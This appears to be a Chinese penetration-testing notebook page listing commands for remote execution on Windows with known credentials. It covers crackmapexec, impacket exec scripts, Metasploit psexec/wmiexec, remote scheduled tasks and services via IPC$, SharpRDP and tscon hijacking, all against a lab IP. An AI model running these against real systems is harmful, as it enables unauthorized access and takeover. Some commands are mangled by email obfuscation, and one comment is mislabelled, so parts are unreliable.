说明

一些情况下如拿到密码本了,但我们仍然需要上到服务器上去翻东西,或者让其上线到C2,直接RDP上又不太好,所以这里就总结一些常见的方法吧。(大多数情况下直接上线到C2是最简单的方式。

exec类

和PTH类似,只不过PTH里面用的是hash,这里用的是明文账号密码。

cme:

cme smb 172.16.93.3 -u administrator -p KsadiN8A.as221 -d org.gm7 -x whoami
cme winrm 172.16.93.3 -u administrator -p KsadiN8A.as221 -d org.gm7 -x whoami

impacket:

python3 examples/wmiexec.py org/administrator:[email protected] whoami
python3 examples/wmiexec.py org/administrator:[email protected] # 不输入命令默认返回一个shell

python3 examples/psexec.py org/administrator:[email protected] whoami
python3 examples/psexec.py org/administrator:[email protected] # 不输入命令默认返回一个shell

python3 examples/smbexec.py org/administrator:[email protected]

python3 examples/dcomexec.py org/administrator:[email protected] whoami
python3 examples/dcomexec.py org/administrator:[email protected] # 不输入命令默认返回一个shell

msf:

use auxiliary/scanner/smb/impacket/wmiexec
set COMMAND whoami
set RHOSTS 172.16.93.3
set SMBPass KsadiN8A.as221
set SMBUSER administrator
run

use exploit/windows/smb/psexec

计划任务和服务

建立IPC连接

net use \\172.16.93.3\ipc$ "KsadiN8A.as221" /user:"Administrator"
# net use # 查看连接列表
# net use * /del # 删除所有IPC连接

查看目标服务器时间

net time \\172.16.93.3

创建计划任务

# 低版本windows
at \\172.16.93.3 15:37 cmd.exe /c "whoami > c:\result.txt"

# 高版本windows
schtasks /Create /S 172.16.93.3 /TN Test /SC minute /MO 1 /TR calc.exe /RU System /F

创建服务

sc \\172.16.93.3 create Test binpath= "cmd.exe /k calc.exe" # binpath的等号后面需要有一个空格
sc start Test # 启动服务
sc stop Test # 删除服务
sc delete Test # 删除服务

RDP

SharpRDP

开启远程桌面的情况下,可以通过远程桌面协议(RDP)在远程主机上执行系统命令,且不需要GUI客户端,使用工具 SharpRDP

注:使用 SharpRDP 成功执行命令后,目标机会出现锁屏状态

SharpRDP.exe computername=172.16.93.3 username=administrator password="KsadiN8A.as221" command="calc.exe"

tscon 劫持

可以通过query user来列出所有登录的用户列表,得到id

在SYSTEM权限下,使用 tscon <ID> 来切换用户不需要验证密码。

没成功过

Copyright © d4m1ts 2023 all right reserved,powered by Gitbook该文章修订时间: 2024-05-08 10:47:53

results matching ""

    No results matching ""